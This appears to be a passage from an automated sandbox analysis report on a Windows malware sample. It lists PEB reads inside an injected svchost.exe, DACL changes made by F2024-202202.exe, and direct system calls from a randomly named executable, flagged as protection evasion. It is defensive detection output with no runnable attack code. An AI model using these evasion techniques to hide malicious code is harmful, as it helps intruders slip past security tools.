            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]2_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]2_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe reads fs:[00000030h], the PEB pointer of a 32-bit process (the usual starting point both for BeingDebugged checks and for walking the loader list to resolve APIs by hand), in the functions below; the count after each function is the number of such reads the sandbox found in it.
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03504940 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001AA364 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtQueryValueKey: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtOpenFile: Direct from: 0x76EF2DCC
